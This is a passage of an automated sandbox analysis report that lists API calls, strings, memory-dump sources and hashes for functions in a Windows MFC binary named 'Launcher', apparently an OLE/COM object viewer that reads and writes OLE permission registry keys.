                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#2634lstrcat$#540#800CloseH_prolog3_OpenQueryValuewsprintf
                                                                                                                • String ID: AccessPermission
                                                                                                                • API String ID: 1928919276-2751749857
                                                                                                                • Opcode ID: f9b87c81068c9471e294cfc1bf33d673d0f590e84623c193daa50e1ccfe89936
                                                                                                                • Instruction ID: 2ea2c54f728ef218ed6f32883524f0a72c102b819947254e260064f04d969a89
                                                                                                                • Opcode Fuzzy Hash: f9b87c81068c9471e294cfc1bf33d673d0f590e84623c193daa50e1ccfe89936
                                                                                                                • Instruction Fuzzy Hash: A821B0B0500619BFEB24AF70CC89FA7BBADEF05345F0141A4B91963151DF715D84CBA0
                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 00B617C7
                                                                                                                • #2859.MFC42U(?,0000000C), ref: 00B617CF
                                                                                                                • #538.MFC42U(QueryInterface(IID_IUnknown) failed on the data object.,?,?,?,?,0000000C), ref: 00B61803
                                                                                                                  • Part of subcall function 00B6D91D: __EH_prolog3.LIBCMT ref: 00B6D924
                                                                                                                  • Part of subcall function 00B6D91D: FormatMessageW.KERNEL32(00001100,00000000,?,00000409,?,00000000,00000000,00000010,00B6B9B7,?,00000000,00000000,00000000), ref: 00B6D942
                                                                                                                  • Part of subcall function 00B6D91D: #540.MFC42U ref: 00B6D94F
                                                                                                                  • Part of subcall function 00B6D91D: #2810.MFC42U(?,%s %s,?,00000000,?), ref: 00B6D96C
                                                                                                                  • Part of subcall function 00B6D91D: #922.MFC42U(?,?,?,?,?,?,?), ref: 00B6D97F
                                                                                                                  • Part of subcall function 00B6D91D: #858.MFC42U(00000000,?,?,?,?,?,?,?), ref: 00B6D98C
                                                                                                                  • Part of subcall function 00B6D91D: #800.MFC42U(00000000,?,?,?,?,?,?,?), ref: 00B6D997
                                                                                                                  • Part of subcall function 00B6D91D: LocalFree.KERNEL32(?,00000000,?,?,?,?,?,?,?), ref: 00B6D99F
                                                                                                                  • Part of subcall function 00B6D91D: #1197.MFC42U(?,00000000,00000000,?,?,?,?), ref: 00B6D9AA
                                                                                                                  • Part of subcall function 00B6D91D: #800.MFC42U(?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00B6DA13
                                                                                                                • #800.MFC42U(?,00000000,QueryInterface(IID_IUnknown) failed on the data object.,?,?,?,?,0000000C), ref: 00B61819
                                                                                                                • #538.MFC42U(Drag and Drop Data Object,?,?,?,?,0000000C), ref: 00B61828
                                                                                                                • #800.MFC42U(00000000,?,Drag and Drop Data Object,?,?,?,?,0000000C), ref: 00B6184D
                                                                                                                Strings
                                                                                                                • Drag and Drop Data Object, xrefs: 00B61820
                                                                                                                • QueryInterface(IID_IUnknown) failed on the data object., xrefs: 00B617FB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #800$#538H_prolog3$#1197#2810#2859#540#858#922FormatFreeLocalMessage
                                                                                                                • String ID: Drag and Drop Data Object$QueryInterface(IID_IUnknown) failed on the data object.
                                                                                                                • API String ID: 393685950-3430251513
                                                                                                                • Opcode ID: 0b5f5b621b3e5ca45ed4e8ae63b7b4983bf6705b64131e9768e23038b869ce5e
                                                                                                                • Instruction ID: 42c59d953407c61f827aa35980d917d1b781e2f46e397d53bc0372f7232f0362
                                                                                                                • Opcode Fuzzy Hash: 0b5f5b621b3e5ca45ed4e8ae63b7b4983bf6705b64131e9768e23038b869ce5e
                                                                                                                • Instruction Fuzzy Hash: 7D118231A0011ADFCB04EBA0C856ABEB7B4FF54325F2046A8E511A72E1CB356E45CB91
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00B6B8D5: __EH_prolog3.LIBCMT ref: 00B6B8DC
                                                                                                                  • Part of subcall function 00B6B8D5: LoadCursorW.USER32(00000000,00007F02), ref: 00B6B8F4
                                                                                                                  • Part of subcall function 00B6B8D5: SetCursor.USER32(00000000), ref: 00B6B8FB
                                                                                                                  • Part of subcall function 00B6B8D5: RegOpenKeyExW.ADVAPI32(?,?,00000000,000F003F,?), ref: 00B6B911
                                                                                                                  • Part of subcall function 00B6B8D5: LoadCursorW.USER32(00000000,00007F00), ref: 00B6B924
                                                                                                                  • Part of subcall function 00B6B8D5: SetCursor.USER32(00000000), ref: 00B6B92B
                                                                                                                • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00B5E924
                                                                                                                  • Part of subcall function 00B6C0BC: __EH_prolog3_GS.LIBCMT ref: 00B6C0C6
                                                                                                                  • Part of subcall function 00B6C0BC: #540.MFC42U(00000488,00B5C76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 00B6C0F1
                                                                                                                  • Part of subcall function 00B6C0BC: RegOpenKeyExW.ADVAPI32 ref: 00B6C112
                                                                                                                  • Part of subcall function 00B6C0BC: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B6C13A
                                                                                                                  • Part of subcall function 00B6C0BC: RegCloseKey.ADVAPI32(?), ref: 00B6C151
                                                                                                                  • Part of subcall function 00B6C0BC: #800.MFC42U ref: 00B6C15F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Cursor$LoadOpen$#540#800CloseH_prolog3H_prolog3_MessageQuerySendValue
                                                                                                                • String ID: All classes$Can Launch$Cannot Launch$DEFAULTLAUNCHPERMISSION$DefaultLaunchPermission$Global Launch$SOFTWARE\MICROSOFT\OLE
                                                                                                                • API String ID: 1128567903-2386912880
                                                                                                                • Opcode ID: bb5e4d8494367dc905d8097215ac1196c52efd69ba1985a0bf64355f8bea9899
                                                                                                                • Instruction ID: e170f36a2402794916e08eefb04397016911056c2820b0e6f644a108210252fd
                                                                                                                • Opcode Fuzzy Hash: bb5e4d8494367dc905d8097215ac1196c52efd69ba1985a0bf64355f8bea9899
                                                                                                                • Instruction Fuzzy Hash: 86E06D7238038076D23221654C4BF8719DDDBC5F93F1504DABA08BA3A28EA59A088264
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00B6B8D5: __EH_prolog3.LIBCMT ref: 00B6B8DC
                                                                                                                  • Part of subcall function 00B6B8D5: LoadCursorW.USER32(00000000,00007F02), ref: 00B6B8F4
                                                                                                                  • Part of subcall function 00B6B8D5: SetCursor.USER32(00000000), ref: 00B6B8FB
                                                                                                                  • Part of subcall function 00B6B8D5: RegOpenKeyExW.ADVAPI32(?,?,00000000,000F003F,?), ref: 00B6B911
                                                                                                                  • Part of subcall function 00B6B8D5: LoadCursorW.USER32(00000000,00007F00), ref: 00B6B924
                                                                                                                  • Part of subcall function 00B6B8D5: SetCursor.USER32(00000000), ref: 00B6B92B
                                                                                                                • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00B5E704
                                                                                                                  • Part of subcall function 00B6C0BC: __EH_prolog3_GS.LIBCMT ref: 00B6C0C6
                                                                                                                  • Part of subcall function 00B6C0BC: #540.MFC42U(00000488,00B5C76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 00B6C0F1
                                                                                                                  • Part of subcall function 00B6C0BC: RegOpenKeyExW.ADVAPI32 ref: 00B6C112
                                                                                                                  • Part of subcall function 00B6C0BC: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B6C13A
                                                                                                                  • Part of subcall function 00B6C0BC: RegCloseKey.ADVAPI32(?), ref: 00B6C151
                                                                                                                  • Part of subcall function 00B6C0BC: #800.MFC42U ref: 00B6C15F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Cursor$LoadOpen$#540#800CloseH_prolog3H_prolog3_MessageQuerySendValue
                                                                                                                • String ID: All classes$Can Access$Cannot Access$DEFAULTACCESSPERMISSION$DefaultAccessPermission$Global Access$SOFTWARE\MICROSOFT\OLE
                                                                                                                • API String ID: 1128567903-1534462617
                                                                                                                • Opcode ID: 53cb94a5f37687652921d07777383516e2c2fb7c741a7b5e933069a8a4e041a4
                                                                                                                • Instruction ID: 8c1e7c4d4808503b472f86fa6fe6bb9dd7a506f106dcf7a0228d3ac29ab1f76e
                                                                                                                • Opcode Fuzzy Hash: 53cb94a5f37687652921d07777383516e2c2fb7c741a7b5e933069a8a4e041a4
                                                                                                                • Instruction Fuzzy Hash: D6E092723C0B4076D23022724C4BF836ADDD7C5F93F1500DABF08B62E2CA969E488674
                                                                                                                APIs
                                                                                                                • #2294.MFC42U(?,000000B8,?), ref: 00B5F556
                                                                                                                • #2294.MFC42U(?,000000B1,?,?,000000B8,?), ref: 00B5F568
                                                                                                                • #2294.MFC42U(?,000000B2,?,?,000000B1,?,?,000000B8,?), ref: 00B5F57A
                                                                                                                • #2294.MFC42U(?,000000A8,?,?,000000B2,?,?,000000B1,?,?,000000B8,?), ref: 00B5F58C
                                                                                                                • #2294.MFC42U(?,00000089,?,?,000000A8,?,?,000000B2,?,?,000000B1,?,?,000000B8,?), ref: 00B5F59E
                                                                                                                • #2362.MFC42U(?,000000B3,?,?,00000089,?,?,000000A8,?,?,000000B2,?,?,000000B1,?,?), ref: 00B5F5B0
                                                                                                                • #2362.MFC42U(?,0000008B,?,?,000000B3,?,?,00000089,?,?,000000A8,?,?,000000B2,?,?), ref: 00B5F5C2
                                                                                                                • #2362.MFC42U(?,00001FA5,?,?,0000008B,?,?,000000B3,?,?,00000089,?,?,000000A8,?,?), ref: 00B5F5D4
                                                                                                                • #2362.MFC42U(?,000000A9,?,?,00001FA5,?,?,0000008B,?,?,000000B3,?,?,00000089,?,?), ref: 00B5F5E6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2294$#2362
                                                                                                                • String ID:
                                                                                                                • API String ID: 4178481822-0
                                                                                                                • Opcode ID: e58633bced6d5a45809b51faafe11d84fbc9487d8c942ae8110a08502053bd4b
                                                                                                                • Instruction ID: ff816fce332c85b53db93cc5caa07661468862eb7acb67feea79aa3443354254
                                                                                                                • Opcode Fuzzy Hash: e58633bced6d5a45809b51faafe11d84fbc9487d8c942ae8110a08502053bd4b
                                                                                                                • Instruction Fuzzy Hash: B8011276241A157AE115F660DC46FEBB39CAF17700F404162FB24DA0C1DBA8B6158BF6
                                                                                                                APIs
                                                                                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,00000050), ref: 00B66789
                                                                                                                • RegOpenKeyW.ADVAPI32(00000000,?,?), ref: 00B667AB
                                                                                                                • RegQueryValueExW.ADVAPI32(?,409,00000000,00000000,?,00000200), ref: 00B667E0
                                                                                                                • wsprintfW.USER32 ref: 00B66813
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00B6690C
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00B6691D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$EnumOpenQueryValuewsprintf
                                                                                                                • String ID: %s <no name>$409
                                                                                                                • API String ID: 3624944744-596716345
                                                                                                                • Opcode ID: 3f1d6c35a9937ccbefff5836f3b1b229e29ca01a2e73842f86fc47d6e1f2db9c
                                                                                                                • Instruction ID: a98c4b2726b59a379a5a9ee0f8951a2c022f0dd647fc66c454625f539c61234d
                                                                                                                • Opcode Fuzzy Hash: 3f1d6c35a9937ccbefff5836f3b1b229e29ca01a2e73842f86fc47d6e1f2db9c
                                                                                                                • Instruction Fuzzy Hash: F541C671A012289FDB60DF64CC44BA9B7FABB95305F1041EAE509E7250EB369EE4CF11
                                                                                                                APIs
                                                                                                                • RegOpenKeyW.ADVAPI32(00B67AC1,InprocServer32,00000000), ref: 00B679C7
                                                                                                                • RegOpenKeyW.ADVAPI32(00B67AC1,InprocHandler32,00000000), ref: 00B679DD
                                                                                                                • RegOpenKeyW.ADVAPI32(00B67AC1,LocalServer32,00000000), ref: 00B679F3
                                                                                                                • RegCloseKey.ADVAPI32(00000000,?,?,00B67AC1), ref: 00B67A00
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Open$Close
                                                                                                                • String ID: InprocHandler32$InprocServer32$LocalServer32
                                                                                                                • API String ID: 3083169812-2616365248
                                                                                                                • Opcode ID: 4da7fb92ac302206aef4be84183390b9192dcebe65c426fff19ade294fec0381
                                                                                                                • Instruction ID: 2eeed03bf28bfac2b9631283b84e21b39353692b5a1ac1bf0aecd33151460c96
                                                                                                                • Opcode Fuzzy Hash: 4da7fb92ac302206aef4be84183390b9192dcebe65c426fff19ade294fec0381
                                                                                                                • Instruction Fuzzy Hash: D2F01731648208FBDB11CBA1DC09AAE7AF8EB0578AB1080A4B905E1060DB74DA55EA60
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(00B6D19D,?,80000000,00000000), ref: 00B6D846
                                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00B521A0,00000000,000F003F,00000000,?,?,?,80000000,00000000), ref: 00B6D881
                                                                                                                • lstrcpyW.KERNEL32(?,00B6D19D,?,80000000,00000000), ref: 00B6D899
                                                                                                                • lstrlenW.KERNEL32(80000000,?,80000000,00000000), ref: 00B6D8A0
                                                                                                                • lstrlenW.KERNEL32(?,?,80000000,00000000), ref: 00B6D8B1
                                                                                                                • RegSetValueExW.ADVAPI32(?,80000000,00000000,00000001,?,00000000,?,80000000,00000000), ref: 00B6D8EA
                                                                                                                • RegCloseKey.ADVAPI32(?,?,80000000,00000000), ref: 00B6D8FC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen$CloseCreateValuelstrcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 2938206059-0
                                                                                                                • Opcode ID: f41a94df5bc02b4ad469b32648f20bc9ca6d74776b701e6a1ec2fb59d789ec1b
                                                                                                                • Instruction ID: 779247314c0a3ff5a243a0c44c7552daf58000130bda92c07f64c5e850fab69f
                                                                                                                • Opcode Fuzzy Hash: f41a94df5bc02b4ad469b32648f20bc9ca6d74776b701e6a1ec2fb59d789ec1b
                                                                                                                • Instruction Fuzzy Hash: 102119B1A40219EBDB109FA5ED48BEB77BDEB44301F004596F619E31A1DB749A848F60
                                                                                                                APIs
                                                                                                                • GetMessagePos.USER32 ref: 00B6210B
                                                                                                                  • Part of subcall function 00B691B7: ScreenToClient.USER32(?,?), ref: 00B691C2
                                                                                                                • #3909.MFC42U(?,?,?,?,?,?), ref: 00B6218B
                                                                                                                  • Part of subcall function 00B691E9: SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00B691FB
                                                                                                                  • Part of subcall function 00B678FA: SendMessageW.USER32(?,0000113E,00000000,00000014), ref: 00B6790C
                                                                                                                • #6266.MFC42U(00000002,?,?,?,00000000,00000014,00000000,?,?,?,?,?), ref: 00B62479
                                                                                                                • #2430.MFC42U(00000002,?,?,?,00000000,00000014,00000000,?,?,?,?,?), ref: 00B62484
                                                                                                                • #2430.MFC42U(00000002,?,?,?,00000000,00000014,00000000,?,?,?,?,?), ref: 00B6248F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$#2430Send$#3909#6266ClientScreen
                                                                                                                • String ID: TypeLib
                                                                                                                • API String ID: 852555880-4260498707
                                                                                                                • Opcode ID: 3302d6b5f35a53a541814e8989e2c8ec0cc152bd1c082a580b32587dd6246f21
                                                                                                                • Instruction ID: 0dcc0efbbb482d5544f180d33d9090928e0e37877ed5d97dd49cf3152c0d57b7
                                                                                                                • Opcode Fuzzy Hash: 3302d6b5f35a53a541814e8989e2c8ec0cc152bd1c082a580b32587dd6246f21
                                                                                                                • Instruction Fuzzy Hash: F5A109319416299BEB34EB54CC8EBECB3F1AB14305F1041E9A519662E1CB785FC4CF11
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: isspace$isdigit$isxdigittoupper
                                                                                                                • String ID:
                                                                                                                • API String ID: 4280169866-0
                                                                                                                • Opcode ID: 260c172f98b4823eb9348f5213145fa680efdf3d6c5a263fb2d1429a60e2ac84
                                                                                                                • Instruction ID: 89b3a25fdeb10900751baef853955541894a51c5f92fed447c0719d6f6216831
                                                                                                                • Opcode Fuzzy Hash: 260c172f98b4823eb9348f5213145fa680efdf3d6c5a263fb2d1429a60e2ac84
                                                                                                                • Instruction Fuzzy Hash: 4C31A0B2F00129D7CB241F69984047677E8EF5537232A456AFC99C7284EB78CC80D6A0
                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 00B5D6BD
                                                                                                                • #364.MFC42U(0000007A,00000008,00B5D2DA,00000004), ref: 00B5D6C9
                                                                                                                  • Part of subcall function 00B5C4B6: __EH_prolog3.LIBCMT ref: 00B5C4BD
                                                                                                                  • Part of subcall function 00B5C4B6: #324.MFC42U(00000088,00000000,00000008,00B5BFBA,00000004), ref: 00B5C4CE
                                                                                                                  • Part of subcall function 00B5C4B6: #567.MFC42U(00000088,00000000,00000008,00B5BFBA,00000004), ref: 00B5C4E5
                                                                                                                  • Part of subcall function 00B5C4B6: #567.MFC42U(00000088,00000000,00000008,00B5BFBA,00000004), ref: 00B5C500
                                                                                                                  • Part of subcall function 00B5C4B6: #567.MFC42U(00000088,00000000,00000008,00B5BFBA,00000004), ref: 00B5C516
                                                                                                                  • Part of subcall function 00B5C4B6: #567.MFC42U(00000088,00000000,00000008,00B5BFBA,00000004), ref: 00B5C52C
                                                                                                                  • Part of subcall function 00B609D5: __EH_prolog3.LIBCMT ref: 00B609DC
                                                                                                                  • Part of subcall function 00B609D5: #324.MFC42U(00000087,00000000,00000008,00B5D6F2,0000007A,00000008,00B5D2DA,00000004), ref: 00B609ED
                                                                                                                  • Part of subcall function 00B609D5: #567.MFC42U(00000087,00000000,00000008,00B5D6F2,0000007A,00000008,00B5D2DA,00000004), ref: 00B60A04
                                                                                                                  • Part of subcall function 00B609D5: #567.MFC42U(00000087,00000000,00000008,00B5D6F2,0000007A,00000008,00B5D2DA,00000004), ref: 00B60A1F
                                                                                                                  • Part of subcall function 00B609D5: #567.MFC42U(00000087,00000000,00000008,00B5D6F2,0000007A,00000008,00B5D2DA,00000004), ref: 00B60A35
                                                                                                                  • Part of subcall function 00B609D5: #567.MFC42U(00000087,00000000,00000008,00B5D6F2,0000007A,00000008,00B5D2DA,00000004), ref: 00B60A4B
                                                                                                                  • Part of subcall function 00B609D5: #567.MFC42U(00000087,00000000,00000008,00B5D6F2,0000007A,00000008,00B5D2DA,00000004), ref: 00B60A61
                                                                                                                  • Part of subcall function 00B5F346: __EH_prolog3.LIBCMT ref: 00B5F34D
                                                                                                                  • Part of subcall function 00B5F346: #324.MFC42U(0000008B,00000000,00000008,00B5D701,0000007A,00000008,00B5D2DA,00000004), ref: 00B5F35E
                                                                                                                  • Part of subcall function 00B5F346: #567.MFC42U(0000008B,00000000,00000008,00B5D701,0000007A,00000008,00B5D2DA,00000004), ref: 00B5F375
                                                                                                                  • Part of subcall function 00B5F346: #567.MFC42U(0000008B,00000000,00000008,00B5D701,0000007A,00000008,00B5D2DA,00000004), ref: 00B5F38F
                                                                                                                  • Part of subcall function 00B5F346: #567.MFC42U(0000008B,00000000,00000008,00B5D701,0000007A,00000008,00B5D2DA,00000004), ref: 00B5F3AA
                                                                                                                  • Part of subcall function 00B5F346: #567.MFC42U(0000008B,00000000,00000008,00B5D701,0000007A,00000008,00B5D2DA,00000004), ref: 00B5F3C0
                                                                                                                  • Part of subcall function 00B5F346: #567.MFC42U(0000008B,00000000,00000008,00B5D701,0000007A,00000008,00B5D2DA,00000004), ref: 00B5F3DA
                                                                                                                  • Part of subcall function 00B5F346: #540.MFC42U(0000008B,00000000,00000008,00B5D701,0000007A,00000008,00B5D2DA,00000004), ref: 00B5F3EF
                                                                                                                  • Part of subcall function 00B5F346: #540.MFC42U(0000008B,00000000,00000008,00B5D701,0000007A,00000008,00B5D2DA,00000004), ref: 00B5F400
                                                                                                                  • Part of subcall function 00B5F346: #540.MFC42U(0000008B,00000000,00000008,00B5D701,0000007A,00000008,00B5D2DA,00000004), ref: 00B5F40F
                                                                                                                  • Part of subcall function 00B5F346: #540.MFC42U(0000008B,00000000,00000008,00B5D701,0000007A,00000008,00B5D2DA,00000004), ref: 00B5F420
                                                                                                                  • Part of subcall function 00B5F346: #861.MFC42U(00B521A0,0000008B,00000000,00000008,00B5D701,0000007A,00000008,00B5D2DA,00000004), ref: 00B5F436
                                                                                                                  • Part of subcall function 00B5F346: #861.MFC42U(00B521A0,00B521A0,0000008B,00000000,00000008,00B5D701,0000007A,00000008,00B5D2DA,00000004), ref: 00B5F442
                                                                                                                  • Part of subcall function 00B5F346: #861.MFC42U(00B521A0,00B521A0,00B521A0,0000008B,00000000,00000008,00B5D701,0000007A,00000008,00B5D2DA,00000004), ref: 00B5F453
                                                                                                                  • Part of subcall function 00B5F346: #861.MFC42U(00B521A0,00B521A0,00B521A0,00B521A0,0000008B,00000000,00000008,00B5D701,0000007A,00000008,00B5D2DA,00000004), ref: 00B5F45F
                                                                                                                  • Part of subcall function 00B5C962: __EH_prolog3.LIBCMT ref: 00B5C969
                                                                                                                  • Part of subcall function 00B5C962: #324.MFC42U(00000085,00000000,00000008,00B5C91A,00000004), ref: 00B5C97A
                                                                                                                  • Part of subcall function 00B5C962: #567.MFC42U(00000085,00000000,00000008,00B5C91A,00000004), ref: 00B5C991
                                                                                                                  • Part of subcall function 00B5C962: #567.MFC42U(00000085,00000000,00000008,00B5C91A,00000004), ref: 00B5C9AB
                                                                                                                  • Part of subcall function 00B5C962: #540.MFC42U(00000085,00000000,00000008,00B5C91A,00000004), ref: 00B5C9C2
                                                                                                                  • Part of subcall function 00B5C962: #540.MFC42U(00000085,00000000,00000008,00B5C91A,00000004), ref: 00B5C9D1
                                                                                                                  • Part of subcall function 00B5C962: #861.MFC42U(00B521A0), ref: 00B5C9E8
                                                                                                                  • Part of subcall function 00B69485: __EH_prolog3.LIBCMT ref: 00B6948C
                                                                                                                  • Part of subcall function 00B69485: #326.MFC42U(00000008,00B5D71F,0000007A,00000008,00B5D2DA,00000004), ref: 00B69496
                                                                                                                  • Part of subcall function 00B69485: #567.MFC42U(00000008,00B5D71F,0000007A,00000008,00B5D2DA,00000004), ref: 00B694AD
                                                                                                                • #567.MFC42U(0000007A,00000008,00B5D2DA,00000004), ref: 00B5D72E
                                                                                                                • #567.MFC42U(0000007A,00000008,00B5D2DA,00000004), ref: 00B5D748
                                                                                                                • #567.MFC42U(0000007A,00000008,00B5D2DA,00000004), ref: 00B5D763
                                                                                                                • #567.MFC42U(0000007A,00000008,00B5D2DA,00000004), ref: 00B5D779
                                                                                                                • #567.MFC42U(0000007A,00000008,00B5D2DA,00000004), ref: 00B5D78F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #567$#540H_prolog3$#861$#324$#326#364
                                                                                                                • String ID:
                                                                                                                • API String ID: 797904982-0
                                                                                                                • Opcode ID: a06c7beafa08447736df1dc56552ca90104cfe2f08a509851d381a17f5a8f96a
